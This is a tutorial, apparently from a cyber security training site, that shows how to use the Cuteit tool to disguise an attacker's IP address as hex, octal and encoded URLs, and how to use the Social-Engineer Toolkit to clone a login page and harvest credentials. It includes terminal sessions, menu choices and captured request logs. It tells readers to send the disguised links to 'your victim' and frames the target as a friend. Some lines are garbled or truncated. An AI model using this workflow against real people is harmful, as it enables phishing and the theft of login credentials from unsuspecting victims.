Convert any Malicious IP Into URL to HACK YOUR FRIEND

Phishing attacks are very common these days. Most large companies face phishing attacks. International Institute of Cyber Security ethical hacking course includes many methods, where attacking or scripting methods are used to hack any company. But phishing is most reliable and easy. And this method still is very useful. Today we are talking about a tool called cuteit.

Ethical hacking researcher of international institute of cyber security says that cuteit is a well designed tool to hide malicious IP. This tool can be used in network pentesting.

Cuteit is design to make malicious IP addresses into regular URLs. A simple python script which helps attacker to make malicious IP look like regular IP. This tool makes IP into many forms. For showing, we have tesed this tool on Kali Linux 2018.4

root@kali:/home/iicybersecurity/Downloads#git clone
Cloning into 'Cuteit'...
remote: Enumerating objects: 17, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (12/12), done.
remote: Total 41 (delta 7), reused 13 (delta 5), pack-reused 24
Unpacking objects: 100% (41/41), done.
root@kali:/home/iicybersecurity/Downloads#cd Cuteit/
root@kali:/home/iicybersecurity/Downloads/Cuteit# ls LICENSE module.png Screenshot1.png Screenshot2.png
usage: [-h] [--disable-coloring] ip error: too few arguments
root@kali:/home/iicybersecurity/Downloads/Cuteit#python -h
usage: [-h] [--disable-coloring] ip

positional arguments:
ip IP you want to convert

optional arguments:
-h, --help show this help message and exit
--disable-coloring Disable colored printing
  • Type python
  • is your local IP/ attacker IP.
Cuteit IP obfuscator made with ❤️ By Karim 'D4Vinci' Shoair
Converting IP to HEX
* Using http://0xc0.168.1.8 form
* Using http://0xc0.0xa8.1.8 form
* Using http://0xc0.0xa8.0x1.8 form
* Using http://0xc0.0xa8.0x1.0x8 form
* Using http://0x00000000c0.0x000000a8.0x00001.0x008 form [0]
[1] [2]
* Using http://0xc0a80108 form
Converting IP to Octal
* Using http://0300.0250.0001.0010 form
Converting IP to Long
* Using http://3232235784 form
Converting IP to urlencoded IP
* Using http://%3192%2E%3168%2E%31%2E%38 form
  • After executing above query a list of regular URLs will be created. Now you can send these URLs to your victim.
  • You can also use these URls in creating an fake page. As ethical hacking instructor of International Institute of Cyber Security explains in class on how we can use Kali Linux inbuilt toolkit to create phishing pages.
  • Open another Linux terminal for creating phishing page. Type sectookit
root@kali:/home/iicybersecurity# setoolkitSelect from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
Select from the menu:
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About
99) Exit the Social-Engineer Toolkit
set> 1Select from the menu:
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) SMS Spoofing Attack Vector
11) Third Party Modules
99) Return back to the main menu.
set> 2
The first method will allow SET to import a list of pre-defined web
applications that it can utilize within the attack.
The second method will completely clone a website of your choosing
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.
The third method allows you to import your own website, note that you
should only have an index.html when using the import website
1) Web Templates
2) Site Cloner
3) Custom Import
99) Return to Webattack Menu

The way that this works is by cloning a site and looking for form fields to
rewrite. If the POST fields are not usual methods for posting forms this
could fail. If it does, you can always save the HTML, rewrite the forms to
be standard forms and use the "IMPORT" feature. Additionally, really
If you are using an EXTERNAL IP ADDRESS, you need to place the EXTERNAL
IP address below, not your NAT address. Additionally, if you don't know
basic networking concepts, and you have a private IP address, you will
need to do port forwarding to your NAT IP address from your external IP
address. A browser doesns't know how to communicate with a private IP
address, so if you don't specify an external IP address if you are using
this from an external perpective, it will not work. This isn't a SET issue
this is how networking works.
set:webattack> IP address for the POST back in Harvester/Tabnabbing []:> Enter the url to
[] This could take a little bit...
The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[ into /var/www/html depending on where your directory structure is.
Press {return} if you understand what we're saying here.
[] The Social-Engineer Toolkit Credential Harvester Attack
[] Information will be displayed to you as it arrives below: - - [11/Feb/2019 01:54:46] "GET / HTTP/1.1" 200 -
directory traversal attempt detected from: - - [11/Feb/2019 01:54:59] "GET /index.html HTTP/1.1" 404 -[

If normal phishing pages are created. There are very less chance that target will open that page. This tool helps as it create malicious IP into regular URLs.

Knowledge belongs to the world